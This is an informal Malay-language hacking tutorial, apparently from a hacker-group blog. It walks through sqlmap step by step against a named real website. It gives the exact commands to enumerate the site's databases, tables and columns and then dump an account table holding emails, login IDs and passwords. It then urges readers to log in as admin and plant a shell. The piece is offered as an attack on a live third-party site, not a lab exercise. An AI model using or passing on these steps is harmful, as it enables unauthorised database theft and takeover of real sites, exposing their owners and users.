(gambar hanyalah hiasan)Assalamualaikum semue. harini eden nk wat tuto sqlmap yg lebih pantas mengorek database untuk sesebuah site yg vuln
Ok jom start Sblom tue, barang2 yang perlu korang ade
1-Python 2.7 (http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi)
2-Sqlmap (http://sqlmap.sourceforge.net/)
3-CMD (same jea dgn command prompt)
4-vuln website
Okei,bila dah siap download,korang install Python 2.7
Kemudian,korang "cut" folder sqlmap dan "paste" kan lam local disk (c:)
Ok siap!
1.Sekarang buka cmd,untuk kali nie saye akan menggunakan vuln website berupa nie
http://www.mmbuildings.com/newsitem.php?id=61
2.Ok skarang di cmd buka dan type
CD/ dan enter
3.kemudian korang taip
"cd sqlmap" dan tekan enter
note:tanpa quatations ""
4.korang taip lam cmd
sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61
5.ok skarang kalau mengikut website yang saye pilih tady akan kluar due option iaitu Y/N
ok type N
6.Korang type lam cmd tu
sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs
note:
kalau anda ikut step by step anda sepatutnya akan dapat database Database yang saye dapat berupa *mm_mm *information_schema <-------yang nie kite ta nak Jadi kite akan pilih mm_mm <----
Macamne kite na pilih??
7.Type nie
sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables
Tunggu sehingga cmd selesai mengescan website tersebut,untuk mengelakkan kebosanan,boleh bukak new tab dan layan porn *astagar* xD
8.Selesai Scan,korang akan nampak "Tables/meja"
Jadi skarang saye akan pilih tables account (ingat setiap website mempunyai tables yang berlainan)
Type dalam cmd
sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns
Bila selesai scan,akan nampak 3 columns iaitu email id login access dan password! :D
9.Okei,sekarang aku akan ambil ketiga2 columns tu...sekarang type ni pulokk
sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --dump
10.Akan tertera email,id login & passwords...okei,sekarang,korang leh cari admin login untuk mengakses ke site tersebut & kemudian tanam shell (untuk blackhat) atau tinggal jejak (untuk pinkhat)
untuk memudahkan korang mencari admin login....korang bleh menggunakan perl
note:boleh pelajari disini
http://www.reaperzhacking.com/2012/02/tuto-cari-admin-login-page.html
sekian,terimakasih :D
p/s:tuto ni diambil dari group silent hacker crew kemudian diolah 70% untuk memudahkan korang membaca serta enjoy tuto kali ini....
Regards,
Pegawai Waran & Xe Phc
Created by X3 Phc
